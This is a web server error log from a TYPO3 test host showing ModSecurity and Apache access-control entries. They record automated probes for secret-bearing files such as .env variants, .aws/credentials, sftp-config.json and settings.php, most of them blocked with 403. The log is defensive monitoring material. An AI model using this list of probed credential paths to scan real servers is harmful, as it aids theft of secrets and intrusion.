[Mon Jun 23 05:38:17.716072 2025] [:error] [pid 4038542] [client 103.141.144.222:51212] [client 103.141.144.222] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aFjMKf8aa4xKF5L8PkbGBgAAAAY"]
[Mon Jun 23 05:38:17.718269 2025] [:error] [pid 4038542] [client 103.141.144.222:51212] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aFjMKf8aa4xKF5L8PkbGBgAAAAY"]
[Mon Jun 23 05:38:17.718451 2025] [:error] [pid 4038542] [client 103.141.144.222:51212] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aFjMKf8aa4xKF5L8PkbGBgAAAAY"]
[Mon Jun 23 05:45:30.265901 2025] [:error] [pid 4037887] [client 103.141.144.222:49376] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aFjN2jZ2g-OQXYZEaPcO3AAAAAI"]
[Mon Jun 23 05:45:30.266202 2025] [:error] [pid 4037887] [client 103.141.144.222:49376] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aFjN2jZ2g-OQXYZEaPcO3AAAAAI"]
[Mon Jun 23 05:45:30.266406 2025] [:error] [pid 4037887] [client 103.141.144.222:49376] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aFjN2jZ2g-OQXYZEaPcO3AAAAAI"]
[Mon Jun 23 05:51:30.210575 2025] [authz_core:error] [pid 4037888] [client 103.141.144.222:58543] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jun 23 05:59:46.655631 2025] [authz_core:error] [pid 4041302] [client 103.141.144.222:61647] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Jun 23 06:05:54.053314 2025] [authz_core:error] [pid 4037889] [client 103.141.144.222:61502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Jun 23 06:09:32.700225 2025] [authz_core:error] [pid 4037887] [client 103.141.144.222:50810] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Jun 23 06:16:16.161264 2025] [:error] [pid 4037885] [client 103.141.144.222:51298] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aFjVEOUEcwzmBTKJmIMzVgAAAAA"]
[Mon Jun 23 06:16:16.161586 2025] [:error] [pid 4037885] [client 103.141.144.222:51298] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aFjVEOUEcwzmBTKJmIMzVgAAAAA"]
[Mon Jun 23 06:16:16.161765 2025] [:error] [pid 4037885] [client 103.141.144.222:51298] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aFjVEOUEcwzmBTKJmIMzVgAAAAA"]
[Mon Jun 23 06:23:15.477966 2025] [:error] [pid 4037892] [client 103.141.144.222:57869] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aFjWs8iFj9JIi4UdQXhXpgAAAAU"]
[Mon Jun 23 06:23:15.478283 2025] [:error] [pid 4037892] [client 103.141.144.222:57869] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aFjWs8iFj9JIi4UdQXhXpgAAAAU"]
[Mon Jun 23 06:23:15.478467 2025] [:error] [pid 4037892] [client 103.141.144.222:57869] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aFjWs8iFj9JIi4UdQXhXpgAAAAU"]
[Mon Jun 23 06:30:06.678831 2025] [:error] [pid 4037886] [client 103.141.144.222:51867] [client 103.141.144.222] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aFjYTiBCpEL0VsKFwayiVQAAAAE"]
[Mon Jun 23 06:30:06.679107 2025] [:error] [pid 4037886] [client 103.141.144.222:51867] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aFjYTiBCpEL0VsKFwayiVQAAAAE"]
[Mon Jun 23 06:30:06.679281 2025] [:error] [pid 4037886] [client 103.141.144.222:51867] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aFjYTiBCpEL0VsKFwayiVQAAAAE"]
[Mon Jun 23 06:37:02.184860 2025] [authz_core:error] [pid 4038542] [client 103.141.144.222:54693] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/mailer.ini
[Mon Jun 23 06:46:53.521593 2025] [:error] [pid 4037892] [client 103.141.144.222:55033] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFjcPciFj9JIi4UdQXhXqAAAAAU"]
[Mon Jun 23 06:46:53.521904 2025] [:error] [pid 4037892] [client 103.141.144.222:55033] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFjcPciFj9JIi4UdQXhXqAAAAAU"]
[Mon Jun 23 06:46:53.522108 2025] [:error] [pid 4037892] [client 103.141.144.222:55033] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFjcPciFj9JIi4UdQXhXqAAAAAU"]
[Mon Jun 23 06:47:14.329554 2025] [:error] [pid 4037887] [client 103.141.144.222:62432] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFjcUjZ2g-OQXYZEaPcO4QAAAAI"]
[Mon Jun 23 06:47:14.329874 2025] [:error] [pid 4037887] [client 103.141.144.222:62432] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFjcUjZ2g-OQXYZEaPcO4QAAAAI"]
[Mon Jun 23 06:47:14.330061 2025] [:error] [pid 4037887] [client 103.141.144.222:62432] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFjcUjZ2g-OQXYZEaPcO4QAAAAI"]
[Mon Jun 23 06:50:27.290686 2025] [:error] [pid 4041302] [client 103.141.144.222:55802] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aFjdE86Iqotu1HXPIYb2yAAAAAc"]
[Mon Jun 23 06:50:27.290972 2025] [:error] [pid 4041302] [client 103.141.144.222:55802] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aFjdE86Iqotu1HXPIYb2yAAAAAc"]
[Mon Jun 23 06:50:27.291149 2025] [:error] [pid 4041302] [client 103.141.144.222:55802] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aFjdE86Iqotu1HXPIYb2yAAAAAc"]
[Mon Jun 23 06:53:43.303787 2025] [:error] [pid 4037885] [client 103.141.144.222:60091] [client 103.141.144.222] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aFjd1-UEcwzmBTKJmIMzWgAAAAA"]
[Mon Jun 23 06:53:43.304091 2025] [:error] [pid 4037885] [client 103.141.144.222:60091] [client 103.141.144.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aFjd1-UEcwzmBTKJmIMzWgAAAAA"]
[Mon Jun 23 06:53:43.304363 2025] [:error] [pid 4037885] [client 103.141.144.222:60091] [client 103.141.144.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aFjd1-UEcwzmBTKJmIMzWgAAAAA"]
[Wed Jun 25 01:40:07.337615 2025] [authz_core:error] [pid 464606] [client 35.237.246.192:48640] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 01 15:51:31.850658 2025] [:error] [pid 4183833] [client 93.123.109.101:60380] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGPn4zF7JWw87UMwoaOWkQAAAAc"]
[Tue Jul 01 15:51:31.852569 2025] [:error] [pid 4183833] [client 93.123.109.101:60380] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGPn4zF7JWw87UMwoaOWkQAAAAc"]
[Tue Jul 01 15:51:31.852770 2025] [:error] [pid 4183833] [client 93.123.109.101:60380] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGPn4zF7JWw87UMwoaOWkQAAAAc"]
[Tue Jul 01 15:51:32.032754 2025] [:error] [pid 4184244] [client 93.123.109.101:60388] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGPn5DKFd6dwguokCxrAigAAAAo"]
[Tue Jul 01 15:51:32.033010 2025] [:error] [pid 4184244] [client 93.123.109.101:60388] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGPn5DKFd6dwguokCxrAigAAAAo"]
[Tue Jul 01 15:51:32.033219 2025] [:error] [pid 4184244] [client 93.123.109.101:60388] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aGPn5DKFd6dwguokCxrAigAAAAo"]
[Tue Jul 01 15:51:32.159388 2025] [:error] [pid 118085] [client 93.123.109.101:41610] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGPn5NFNwEoyRpy3eAERCQAAAA4"]
[Tue Jul 01 15:51:32.159635 2025] [:error] [pid 118085] [client 93.123.109.101:41610] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGPn5NFNwEoyRpy3eAERCQAAAA4"]
[Tue Jul 01 15:51:32.159809 2025] [:error] [pid 118085] [client 93.123.109.101:41610] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aGPn5NFNwEoyRpy3eAERCQAAAA4"]
[Tue Jul 01 15:51:32.264131 2025] [:error] [pid 4183936] [client 93.123.109.101:41612] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGPn5EFBW4b-TGAsVCpfDQAAAAk"]
[Tue Jul 01 15:51:32.264387 2025] [:error] [pid 4183936] [client 93.123.109.101:41612] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGPn5EFBW4b-TGAsVCpfDQAAAAk"]
